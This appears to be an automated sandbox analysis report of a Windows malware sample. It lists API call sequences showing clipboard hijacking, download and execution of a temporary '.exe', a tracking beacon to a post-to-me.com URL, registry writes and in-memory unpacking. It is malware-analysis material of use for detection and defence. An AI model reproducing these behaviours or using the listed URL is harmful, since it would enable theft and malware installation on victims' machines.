167 API calls 65731->65732 65739 403392 std::ios_base::_Ios_base_dtor 65731->65739 65733 403362 65732->65733 65736 40458c 26 API calls 65733->65736 65733->65739 65734 40c618 167 API calls 65735 4033ce Concurrency::details::ResourceManager::DynamicResourceManager 65734->65735 65735->65678 65737 403373 65736->65737 65738 404c14 167 API calls 65737->65738 65738->65739 65739->65734 65739->65735 65741 403b97 Concurrency::details::ResourceManager::DynamicResourceManager 65740->65741 65742 4042af 167 API calls 65741->65742 65743 403ba3 65742->65743 65744 403bc7 Concurrency::details::ResourceManager::DynamicResourceManager 65743->65744 65745 4034fb 167 API calls 65743->65745 65744->65680 65745->65744 65747 404356 28 API calls 65746->65747 65748 40312c Concurrency::details::ReferenceCountedQuickBitSet::Grow 65747->65748 65748->65685 65750 403c2c Concurrency::details::ResourceManager::DynamicResourceManager 65749->65750 65751 40c618 167 API calls 65750->65751 65752 403c4f 65751->65752 65753 4042af 167 API calls 65752->65753 65754 403c59 65753->65754 65756 403c9c Concurrency::details::ResourceManager::DynamicResourceManager 65754->65756 65758 4034fb 167 API calls 65754->65758 65755 403c7a 65755->65756 65757 4046ca 167 API calls 65755->65757 65756->65687 65757->65756 65758->65755 65760 403cce __EH_prolog3_catch 65759->65760 65761 4042af 167 API calls 65760->65761 65763 403ce7 65761->65763 65762 4046ca 167 API calls 65764 403d70 Concurrency::details::ResourceManager::DynamicResourceManager 65762->65764 65765 403d17 65763->65765 65766 40369f 40 API calls 65763->65766 65764->65690 65765->65762 65766->65765 65767->65688 65768->65688 65770 40cca3 65769->65770 65771 40ccb0 ~ListArray 65769->65771 65772 40cc72 _Deallocate 26 API calls 65770->65772 65771->65695 65772->65771 65773->65633 65775 40cc2c _strlen 65774->65775 65781 40cbc7 65775->65781 65777 401704 65777->65636 65778->65646 65779->65651 65780->65646 65782 40cbfa 65781->65782 65783 40cbd6 BuildCatchObjectHelperInternal 65781->65783 65782->65783 65785 40cb5c 28 API calls 4 library calls 65782->65785 65783->65777 65785->65783 65794 40f22a EnterCriticalSection 65786->65794 65788 40def4 65789 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65788->65789 65790 40ced2 65789->65790 65791 40cec7 CloseHandle 65789->65791 65792 40ced6 GetCurrentThreadId 65790->65792 65791->65792 65792->65657 65793->65658 65794->65788 65804 431f5e GetLastError 65795->65804 65797 42e083 ExitThread 65800 42e0b4 65800->65797 65803 42e0c0 FreeLibraryAndExitThread 65800->65803 65801 42e0a1 65801->65800 65802 42e0ad CloseHandle 65801->65802 65802->65800 65805 431f7d 65804->65805 65806 431f77 65804->65806 65808 434d2a __Thrd_start 17 API calls 65805->65808 65810 431fd4 SetLastError 65805->65810 65824 435111 11 API calls 2 library calls 65806->65824 65809 431f8f 65808->65809 65811 431f97 65809->65811 65825 435167 11 API calls 2 library calls 65809->65825 65813 42e07f 65810->65813 65815 43346a _free 17 API calls 65811->65815 65813->65797 65813->65801 65823 4354f6 10 API calls 2 library calls 65813->65823 65814 431fac 65814->65811 65816 431fb3 65814->65816 65817 431f9d 65815->65817 65826 431d4c 20 API calls __dosmaperr 65816->65826 65818 431fcb SetLastError 65817->65818 65818->65813 65820 431fbe 65821 43346a _free 17 API calls 65820->65821 65822 431fc4 65821->65822 65822->65810 65822->65818 65823->65801 65824->65805 65825->65814 65826->65820 65827->65474 65828 40239e 65829 402561 PostQuitMessage 65828->65829 65830 4023b2 65828->65830 65834 40255f 65829->65834 65831 4023b9 DefWindowProcW 65830->65831 65832 4023d0 65830->65832 65831->65834 65833 4029f4 167 API calls 65832->65833 65832->65834 65833->65834

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                        • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                      • OpenClipboard.USER32(00000000), ref: 0040171D
                                                      • GetClipboardData.USER32(00000001), ref: 0040172D
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                      • _strlen.LIBCMT ref: 00401749
                                                      • _strlen.LIBCMT ref: 00401778
                                                      • _strlen.LIBCMT ref: 004018BC
                                                      • EmptyClipboard.USER32 ref: 004018D2
                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                      • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                      • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                      • CloseClipboard.USER32 ref: 0040193D
                                                      • Sleep.KERNEL32(000002D2), ref: 00401948
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                      • String ID: i
                                                      • API String ID: 1583243082-3865851505
                                                      • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                      • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                      • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                      • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                      • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                      • CloseHandle.KERNEL32(?), ref: 00402B89
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                      • String ID: .exe$<$ShareScreen
                                                      • API String ID: 3323492106-493228180
                                                      • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                      • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                      • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                      • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AF9CB6
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00AF9CD6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: d082efff67586f47a41cb68a27ba35ab69374b1cd4d5f75ddaba2fead1d9a9bd
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: CAF062351007196FD7203BF9998DBBBB6E8AF49724F100529F742921C0DA70EC468A61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 98 43d1b4-43d1b7 92->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->99 96 43d102-43d106 93->96 97 43d137-43d15d GetLastError call 42ea93 93->97 96->97 103 43d108-43d135 call 43cd0a 96->103 97->83 101 43d1c0-43d1c6 98->101 102 43d1b9-43d1be 98->102 99->83 113 43d1a4-43d1af call 42eac9 99->113 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->97 116 43d21a-43d226 call 43cf1b 106->116 117 43d228-43d24c call 43cabd 106->117 107->106 113->83 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->94 126 43d2c3-43d2d1 124->126 127 43d2a4-43d2a8 124->127 125->123 131 43d2d7-43d2db 126->131 132 43d35c 126->132 127->126 130 43d2aa-43d2be 127->130 130->126 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                      APIs
                                                        • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                      • GetLastError.KERNEL32 ref: 0043D150
                                                      • __dosmaperr.LIBCMT ref: 0043D157
                                                      • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                      • GetLastError.KERNEL32 ref: 0043D16D
                                                      • __dosmaperr.LIBCMT ref: 0043D176
                                                      • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                      • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                      • GetLastError.KERNEL32 ref: 0043D312
                                                      • __dosmaperr.LIBCMT ref: 0043D319
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                      • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                      • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                      • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 160 4332d5 144->160 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 158 432fc3-432fc7 157->158 159 4332b9-4332bb 157->159 158->159 163 432fcd-432fd1 158->163 164 4332d8-4332dd 159->164 160->164 163->156 167 432fd3-432fea 163->167 165->160 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 208 4331f0 175->208 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 181 4330c3-4330d3 177->181 182 433191-43319a call 43d365 177->182 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 181->182 185 4330d9-4330db 181->185 195 43320d 182->195 196 43319c-4331ae 182->196 185->182 189 4330e1-433107 185->189 189->182 193 43310d-433120 189->193 193->182 198 433122-433124 193->198 200 433211-433229 ReadFile 195->200 196->195 201 4331b0-4331bf GetConsoleMode 196->201 198->182 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 201->195 207 4331c1-4331c5 201->207 203->182 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 207->200 216 4331c7-4331e1 ReadConsoleW 207->216 209 4331f3-4331fd call 43346a 208->209 209->164 210->182 222 433168-43316a 210->222 211->177 212->208 213->208 219 4332b2-4332b4 214->219 220 4331e9-4331ef call 42ea93 214->220 226 433236-433248 215->226 217 4331e3 GetLastError 216->217 218 433202-43320b 216->218 217->220 218->226 219->209 220->208 222->182 229 43316c-43318c 222->229 226->209 233 43324a-43324e 226->233 229->182 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 240 433274 call 432d95 238->240 241 43327e-433283 call 432a85 238->241 248 433279-43327c 240->248 241->248 247->209 248->247
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                      • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 250 248003c-2480047 251 2480049 250->251 252 248004c-2480263 call 2480a3f call 2480e0f call 2480d90 VirtualAlloc 250->252 251->252 267 248028b-2480292 252->267 268 2480265-2480289 call 2480a69 252->268 270 24802a1-24802b0 267->270 272 24802ce-24803c2 VirtualProtect call 2480cce call 2480ce7 268->272 270->272 273 24802b2-24802cc 270->273 279 24803d1-24803e0 272->279 273->270 280 2480439-24804b8 VirtualFree 279->280 281 24803e2-2480437 call 2480ce7 279->281 282 24804be-24804cd 280->282 283 24805f4-24805fe 280->283 281->279 286 24804d3-24804dd 282->286 287 248077f-2480789 283->287 288 2480604-248060d 283->288 286->283 292 24804e3-2480505 LoadLibraryA 286->292 290 248078b-24807a3 287->290 291 24807a6-24807b0 287->291 288->287 293 2480613-2480637 288->293 290->291 294 248086e-24808be LoadLibraryA 291->294 295 24807b6-24807cb 291->295 296 2480517-2480520 292->296 297 2480507-2480515 292->297 298 248063e-2480648 293->298 302 24808c7-24808f9 294->302 299 24807d2-24807d5 295->299 300 2480526-2480547 296->300 297->300 298->287 301 248064e-248065a 298->301 303 2480824-2480833 299->303 304 24807d7-24807e0 299->304 305 248054d-2480550 300->305 301->287 306 2480660-248066a 301->306 307 24808fb-2480901 302->307 308 2480902-248091d 302->308 314 2480839-248083c 303->314 309 24807e2 304->309 310 24807e4-2480822 304->310 311 24805e0-24805ef 305->311 312 2480556-248056b 305->312 313 248067a-2480689 306->313 307->308 309->303 310->299 311->286 315 248056d 312->315 316 248056f-248057a 312->316 317 248068f-24806b2 313->317 318 2480750-248077a 313->318 314->294 319 248083e-2480847 314->319 315->311 321 248059b-24805bb 316->321 322 248057c-2480599 316->322 323 24806ef-24806fc 317->323 324 24806b4-24806ed 317->324 318->298 325 2480849 319->325 326 248084b-248086c 319->326 333 24805bd-24805db 321->333 322->333 327 248074b 323->327 328 24806fe-2480748 323->328 324->323 325->294 326->314 327->313 328->327 333->305
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen_wcslen
                                                      • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3067768807-1501832161
                                                      • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                      • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                      • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                      • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                      • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                      • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

                                                      Control-flow Graph

                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                      • __Cnd_signal.LIBCPMT ref: 00405828
                                                      • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                      • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                      • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread
                                                      • String ID: F(@
                                                      • API String ID: 1611280651-2698495834
                                                      • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                      • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 445 42e178-42e184 call 42e03d 443->445 447 42e189-42e18e 444->447 448 42e169-42e175 GetLastError call 42ea93 444->448 445->452 450 42e190-42e193 447->450 451 42e195-42e197 447->451 448->443 450->451 451->445
                                                      APIs
                                                      • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                      • __dosmaperr.LIBCMT ref: 0042E170
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2744730728-0
                                                      • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                      • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                      • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                      • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 461 4347a7-4347b1 459->461 462 434798-4347a5 GetLastError call 42ea93 459->462 466 43477a-43477e 460->466 465 4347b3-4347c8 461->465 461->466 462->466 468 4347cd-4347d2 465->468 466->468
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                      • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                      • __dosmaperr.LIBCMT ref: 0043479F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2336955059-0
                                                      • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                      • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                      APIs
                                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID:
                                                      • API String ID: 1818849710-0
                                                      • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                      • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                      • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                      APIs
                                                        • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                        • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                        • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                      • ExitThread.KERNEL32 ref: 0042E086
                                                      • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                      • String ID:
                                                      • API String ID: 1198197534-0
                                                      • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
